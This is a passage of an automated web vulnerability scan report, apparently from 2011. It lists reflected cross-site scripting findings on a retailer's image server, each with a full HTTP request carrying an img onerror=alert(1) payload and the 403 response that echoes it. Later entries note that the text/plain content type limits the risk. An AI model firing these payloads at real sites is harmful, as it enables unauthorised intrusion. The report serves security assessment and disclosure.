This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/8868382_sw_054e7502<img%20src%3da%20onerror%3dalert(1)>07e6cff3556?$11_product_swatch$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 89
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:10:22 GMT
Connection: close

Unable to find /pacsunproducts/8868382_sw_054e7502<img src=a onerror=alert(1)>07e6cff3556

3.234. http://images3.pacsun.com/is/image/pacsunproducts/8868382_sw_066 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8868382_sw_066

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 65aeb<img%20src%3da%20onerror%3dalert(1)>0fc86ecbee1 was submitted in the REST URL parameter 4. This input was echoed as 65aeb<img src=a onerror=alert(1)>0fc86ecbee1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/8868382_sw_06665aeb<img%20src%3da%20onerror%3dalert(1)>0fc86ecbee1?$11_product_swatch$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 89
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:10:22 GMT
Connection: close

Unable to find /pacsunproducts/8868382_sw_06665aeb<img src=a onerror=alert(1)>0fc86ecbee1

3.235. http://images3.pacsun.com/is/image/pacsunproducts/8878167_01 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8878167_01

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 985a8<img%20src%3da%20onerror%3dalert(1)>e780e45a551 was submitted in the REST URL parameter 4. This input was echoed as 985a8<img src=a onerror=alert(1)>e780e45a551 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/8878167_01985a8<img%20src%3da%20onerror%3dalert(1)>e780e45a551?$11_product_list$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 85
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:09:51 GMT
Connection: close

Unable to find /pacsunproducts/8878167_01985a8<img src=a onerror=alert(1)>e780e45a551

3.236. http://images3.pacsun.com/is/image/pacsunproducts/8878225_01 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8878225_01

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload f6019<img%20src%3da%20onerror%3dalert(1)>b1a0c8122d5 was submitted in the REST URL parameter 4. This input was echoed as f6019<img src=a onerror=alert(1)>b1a0c8122d5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/8878225_01f6019<img%20src%3da%20onerror%3dalert(1)>b1a0c8122d5?$11_product_list$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 85
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:10:15 GMT
Connection: close

Unable to find /pacsunproducts/8878225_01f6019<img src=a onerror=alert(1)>b1a0c8122d5

3.237. http://images3.pacsun.com/is/image/pacsunproducts/8886004_01_516 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8886004_01_516

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 77a6a<img%20src%3da%20onerror%3dalert(1)>0e187afc1a3 was submitted in the REST URL parameter 4. This input was echoed as 77a6a<img src=a onerror=alert(1)>0e187afc1a3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/8886004_01_51677a6a<img%20src%3da%20onerror%3dalert(1)>0e187afc1a3?$11_product_list$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 89
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:10:20 GMT
Connection: close

Unable to find /pacsunproducts/8886004_01_51677a6a<img src=a onerror=alert(1)>0e187afc1a3

3.238. http://images3.pacsun.com/is/image/pacsunproducts/8886004_sw_003 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8886004_sw_003

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 52c6b<img%20src%3da%20onerror%3dalert(1)>7e246c89ffb was submitted in the REST URL parameter 4. This input was echoed as 52c6b<img src=a onerror=alert(1)>7e246c89ffb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/8886004_sw_00352c6b<img%20src%3da%20onerror%3dalert(1)>7e246c89ffb?$11_product_swatch$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 89
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:10:15 GMT
Connection: close

Unable to find /pacsunproducts/8886004_sw_00352c6b<img src=a onerror=alert(1)>7e246c89ffb

3.239. http://images3.pacsun.com/is/image/pacsunproducts/8886004_sw_516 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8886004_sw_516

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 8c474<img%20src%3da%20onerror%3dalert(1)>6ecf10dfb31 was submitted in the REST URL parameter 4. This input was echoed as 8c474<img src=a onerror=alert(1)>6ecf10dfb31 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/8886004_sw_5168c474<img%20src%3da%20onerror%3dalert(1)>6ecf10dfb31?$11_product_swatch$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 89
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:10:15 GMT
Connection: close

Unable to find /pacsunproducts/8886004_sw_5168c474<img src=a onerror=alert(1)>6ecf10dfb31

3.240. http://images3.pacsun.com/is/image/pacsunproducts/8898025_01 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8898025_01

Issue detail

The value of REST URL parameter 4 is copied unencoded into the body of the application's error response. The payload 790d9<img%20src%3da%20onerror%3dalert(1)>6d991b1fd4a was submitted in REST URL parameter 4 and was echoed as 790d9<img src=a onerror=alert(1)>6d991b1fd4a in the 403 body.

The echoed markup carries an img onerror event handler, so any browser that renders this response as HTML executes attacker-supplied JavaScript. Caveat: the response below is served as Content-Type: text/plain with no X-Content-Type-Options: nosniff header. A browser that honours the declared type shows the markup as text, so the High/Certain rating holds only for clients that sniff the body as HTML; the missing output encoding is the underlying defect in either case.

Request

GET /is/image/pacsunproducts/8898025_01790d9<img%20src%3da%20onerror%3dalert(1)>6d991b1fd4a?$11_product_list$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 85
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:09:42 GMT
Connection: close

Unable to find /pacsunproducts/8898025_01790d9<img src=a onerror=alert(1)>6d991b1fd4a

3.241. http://images3.pacsun.com/is/image/pacsunproducts/8902629_01_001 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8902629_01_001

Issue detail

The value of REST URL parameter 4 is copied unencoded into the body of the application's error response. The payload 626be<img%20src%3da%20onerror%3dalert(1)>47c850577d4 was submitted in REST URL parameter 4 and was echoed as 626be<img src=a onerror=alert(1)>47c850577d4 in the 403 body.

The echoed markup carries an img onerror event handler, so any browser that renders this response as HTML executes attacker-supplied JavaScript. Caveat: the response below is served as Content-Type: text/plain with no X-Content-Type-Options: nosniff header. A browser that honours the declared type shows the markup as text, so the High/Certain rating holds only for clients that sniff the body as HTML; the missing output encoding is the underlying defect in either case.

Request

GET /is/image/pacsunproducts/8902629_01_001626be<img%20src%3da%20onerror%3dalert(1)>47c850577d4?$11_product_list$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 89
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:09:42 GMT
Connection: close

Unable to find /pacsunproducts/8902629_01_001626be<img src=a onerror=alert(1)>47c850577d4

3.242. http://images3.pacsun.com/is/image/pacsunproducts/8902629_sw_001 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8902629_sw_001

Issue detail

The value of REST URL parameter 4 is copied unencoded into the body of the application's error response. The payload ad2b5<img%20src%3da%20onerror%3dalert(1)>17205cea70a was submitted in REST URL parameter 4 and was echoed as ad2b5<img src=a onerror=alert(1)>17205cea70a in the 403 body.

The echoed markup carries an img onerror event handler, so any browser that renders this response as HTML executes attacker-supplied JavaScript. Caveat: the response below is served as Content-Type: text/plain with no X-Content-Type-Options: nosniff header. A browser that honours the declared type shows the markup as text, so the High/Certain rating holds only for clients that sniff the body as HTML; the missing output encoding is the underlying defect in either case.

Request

GET /is/image/pacsunproducts/8902629_sw_001ad2b5<img%20src%3da%20onerror%3dalert(1)>17205cea70a?$11_product_swatch$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 89
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:09:41 GMT
Connection: close

Unable to find /pacsunproducts/8902629_sw_001ad2b5<img src=a onerror=alert(1)>17205cea70a

3.243. http://images3.pacsun.com/is/image/pacsunproducts/8902629_sw_048 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8902629_sw_048

Issue detail

The value of REST URL parameter 4 is copied unencoded into the body of the application's error response. The payload 9b2fe<img%20src%3da%20onerror%3dalert(1)>b6120455008 was submitted in REST URL parameter 4 and was echoed as 9b2fe<img src=a onerror=alert(1)>b6120455008 in the 403 body.

The echoed markup carries an img onerror event handler, so any browser that renders this response as HTML executes attacker-supplied JavaScript. Caveat: the response below is served as Content-Type: text/plain with no X-Content-Type-Options: nosniff header. A browser that honours the declared type shows the markup as text, so the High/Certain rating holds only for clients that sniff the body as HTML; the missing output encoding is the underlying defect in either case.

Request

GET /is/image/pacsunproducts/8902629_sw_0489b2fe<img%20src%3da%20onerror%3dalert(1)>b6120455008?$11_product_swatch$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 89
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:09:43 GMT
Connection: close

Unable to find /pacsunproducts/8902629_sw_0489b2fe<img src=a onerror=alert(1)>b6120455008

3.244. http://images3.pacsun.com/is/image/pacsunproducts/8904468_01 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8904468_01

Issue detail

The value of REST URL parameter 4 is copied unencoded into the body of the application's error response. The payload 52787<img%20src%3da%20onerror%3dalert(1)>d1e2b34e36a was submitted in REST URL parameter 4 and was echoed as 52787<img src=a onerror=alert(1)>d1e2b34e36a in the 403 body.

The echoed markup carries an img onerror event handler, so any browser that renders this response as HTML executes attacker-supplied JavaScript. Caveat: the response below is served as Content-Type: text/plain with no X-Content-Type-Options: nosniff header. A browser that honours the declared type shows the markup as text, so the High/Certain rating holds only for clients that sniff the body as HTML; the missing output encoding is the underlying defect in either case.

Request

GET /is/image/pacsunproducts/8904468_0152787<img%20src%3da%20onerror%3dalert(1)>d1e2b34e36a?$11_product_list$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 85
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:09:42 GMT
Connection: close

Unable to find /pacsunproducts/8904468_0152787<img src=a onerror=alert(1)>d1e2b34e36a

